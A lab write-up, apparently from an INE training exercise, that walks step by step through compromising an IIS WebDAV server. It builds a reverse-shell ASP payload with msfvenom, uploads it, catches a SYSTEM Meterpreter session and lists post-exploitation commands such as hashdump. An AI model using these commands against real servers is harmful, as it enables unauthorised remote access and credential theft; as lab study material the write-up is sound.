RS
Raj Sheth

Exploiting WebDAV using Metasploit

WebDAV misconfiguration exploitation to gain remote access. Explains scanning, module selection, and session handling.

Tools/Skills:
Web Exploit
Metasploit
MSF
Posted on November 18, 2025

Method 1 : Using msfvenom

Environment / interfaces

  • Host IPs on attacker machine:

    • eth0: 10.1.0.24/16

    • eth1: 10.10.37.16/24 ← used as LHOST for payload

  • Target: demo.ine.local10.2.30.66

Discovery (Nmap)

Commands used:

nmap -sC -sV demo.ine.local nmap -sV --script=http-enum -p80 demo.ine.local

Key findings:

  • HTTP (80) → Microsoft-IIS/10.0

    • WebDAV methods present: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK

    • /webdav/ exists and requires authentication (401 Unauthorized)

  • SMB/RPC/NetBIOS: 135, 139, 445 open

  • RDP: 3389 open (IIS host Windows Server 2019, build 17763)

  • MySQL: 3306 open (unauthorized)

Notes:

  • http-enum flagged /webdav/ as interesting and protected by basic auth.

Payload creation (msfvenom)

Command executed:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.37.16 LPORT=2807 -f asp > shell.asp

Observed output:

  • Payload chosen: windows/meterpreter/reverse_tcp (x86)

  • Payload size: 354 bytes

  • ASP final file: 38233 bytes

Interpretation:

  • msfvenom wrapped raw shellcode inside an ASP stub suitable for upload to IIS with WebDAV PUT.

Upload via WebDAV (cadaver)

Steps:

  1. cadaver http://demo.ine.local → initial / returned 401 Unauthorized

  2. open http://demo.ine.local/webdav/ → provided credentials:

    • Username: bob

    • Password: (interactive)

  3. Listing /webdav/ showed files.

  4. Upload:

put /root/shell.asp

Result:

  • shell.asp uploaded successfully to /webdav/shell.asp.

Notes:

  • Using valid credentials avoided brute-force. Always ensure attack does not cause DoS.

Metasploit handler and session

Commands:

service postgresql start msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.37.16 set LPORT 2807 run

Outcome:

  • Handler started on 10.10.37.16:2807.

  • Meterpreter session established from 10.2.30.66.

  • meterpreter session opened.

Verification commands shown:

meterpreter > sysinfo # shows Computer: AD-IIS, OS: Windows Server 2019, Meterpreter: x86/windows meterpreter > getuid # Server username: NT AUTHORITY\SYSTEM

Implication:

  • The uploaded shell.asp executed and staged a Meterpreter payload.

  • The Meterpreter process is running as NT AUTHORITY\SYSTEM.

Lessons / key points

  • IIS with WebDAV and writable /webdav/ can accept server-side payloads (ASP) and execute them if ASP execution is allowed.

  • msfvenom output must match server-side technology. Example: use -f asp for IIS with ASP enabled.

  • Use an authenticated upload when possible to avoid noisy bruteforce attempts.

  • Confirm architecture/bitness: msfvenom created x86 payload; Meterpreter reported x86/windows but sysinfo showed x64 OS. That works via WoW64 or x86 process execution on x64 OS.

  • After getting a session, confirm privileges (getuid) and sysinfo before further actions.

Quick checklist for replication

  1. nmap -sC -sV demo.ine.local

  2. nmap -sV --script=http-enum -p80 demo.ine.local

  3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f asp > shell.asp

  4. cadaver http://demo.ine.local/webdav/put shell.asp

  5. msfconsoleuse exploit/multi/handler

  6. set payload windows/meterpreter/reverse_tcp

  7. set LHOST <attacker-ip>; set LPORT <port>

  8. run → wait for session

  9. meterpreter> sysinfo and meterpreter> getuid

Recommended next steps (for learning)

  • Inspect shell.asp to see the wrapper and staging process.

  • Verify whether ASP execution can be restricted by web.config. Check web.config in /webdav/.

  • Practice post-exploitation safely in lab: enumerate services, dump SAM/LSA, escalate persistence only on allowed targets.

  • Log and document every command and timestamps for reproducibility.

Method 2 : # WebDAV exploit via Metasploit module (demo.ine.local)

Goal

Authenticated file upload to IIS WebDAV and remote code execution using Meterpreter.

Module

exploit/windows/iis/iis_webdav_upload_asp

Why this works

  • WebDAV allows PUT, MOVE, COPY.

  • IIS executes .asp under Classic ASP.

  • Module uploads payload as .txt, then renames to .asp with MOVE or COPY, executes it, and optionally deletes.

Minimal runbook

1) Find module

search iis upload use exploit/windows/iis/iis_webdav_upload_asp

2) Configure auth and target

set HttpUsername bob set HttpPassword password_123321 set RHOSTS 10.2.30.66 set RPORT 80 # If virtual host needed: # set VHOST demo.ine.local

3) Payload and listener

# Defaults to windows/meterpreter/reverse_tcp set LHOST 10.10.37.16 set LPORT 4444

4) WebDAV path and method

set PATH /webdav/metasploit.asp set METHOD move # or: copy

5) Exploit

exploit

Expected console flow

  • Upload .txt → Move to .asp → Execute → Attempt delete → Meterpreter session opens.

Evidence from your run

  • Handler: 10.10.37.16:4444

  • Upload: /webdav/metasploit.txt/webdav/metasploit.asp

  • Session: Meterpreter x86 on Windows Server 2019 (10.0.17763)

  • Privilege: NT AUTHORITY\SYSTEM

  • Post actions:

    • Browsed c:\windows\system32\inetsrv and c:\

    • Read c:\flag.txt:

      d3aff16a801b4b7d36b4da1094bee345

Quick post-exploitation checklist

sysinfo getuid getpid ps getprivs ipconfig route hashdump # if permitted wmic product get # software inventory via shell ls -la # enumerate sensitive dirs

Persistence and data access only in lab scope.

Common pitfalls and fixes

  • 401 Unauthorized: set HttpUsername and HttpPassword.

  • 403 Forbidden or 405 Method Not Allowed: WebDAV write not permitted or ASP execution blocked in that directory. Try another DAV path or verify web.config execution rules.

  • 404 on PATH: wrong virtual directory. Confirm with nmap --script http-enum or manual browse.

  • No callback:

    • Wrong LHOST or blocked LPORT. Use attacker interface IP visible to target (ifconfig showed eth1: 10.10.37.16).

    • Perimeter filter on egress. Try common ports (80, 443, 53) if allowed in lab.

  • x86 Meterpreter on x64 OS: normal. Migrate to a 64-bit process if needed:

    ps migrate <pid_of_64bit_w3wp_or_explorer_if_available>

  • Virtual host routing: set VHOST demo.ine.local if the server uses host headers.

OPSEC notes for labs

  • Module is noisy: PUT, MOVE, and an HTTP GET for execution. Expect IIS and DAV logs.

  • Delete step may fail. Manually clean: del /q via shell or rm via meterpreter if allowed.

Compare to manual method

  • Manual: msfvenom ASP → cadaver PUT → browse to trigger → handler.

  • Module: One command path. Handles upload, rename, execute, cleanup. Faster for repeatability.

Reproduce fast

use exploit/windows/iis/iis_webdav_upload_asp set RHOSTS 10.2.30.66 set HttpUsername bob set HttpPassword password_123321 set PATH /webdav/pwn.asp set LHOST 10.10.37.16 set LPORT 4444 set METHOD move run